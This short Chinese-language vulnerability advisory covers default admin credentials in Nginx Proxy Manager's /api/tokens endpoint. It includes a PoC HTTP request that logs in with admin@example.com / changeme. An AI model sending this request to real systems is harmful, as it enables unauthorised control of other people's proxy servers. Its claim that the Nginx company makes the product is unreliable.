Nginx Proxy Manager /api/tokens 默认口令漏洞

2026-04-17 Nginx Proxy Manager PoC Public

Description

Nginx Proxy Manager 是 Nginx 公司推出的一款开源 Nginx 管理平台,专为简化 Nginx 反向代理和负载均衡配置设计。该产品提供可视化的 Web 管理界面,支持创建和管理代理主机、配置 SSL 证书、设置负载均衡策略、监控访问流量、管理用户权限等核心功能。Nginx Proxy Manager 采用 Node.js 和 Vue.js 架构开发,提供 RESTful API,支持多用户权限管理,广泛应用于 Web 服务代理、API 网关管理、微服务架构和 SSL 证书自动化管理等场景。Nginx Proxy Manager 的 /api/tokens 接口存在默认口令漏洞,系统使用了预设的默认管理员凭证(用户名 admin@example.com,密码 changeme),攻击者可直接使用这些凭据登录系统,获取管理权限。

PoC

POST /api/tokens HTTP/1.1
Host: 
Content-Type: application/json
Content-Length: 54
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

{"identity": "admin@example.com","secret": "changeme"}

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities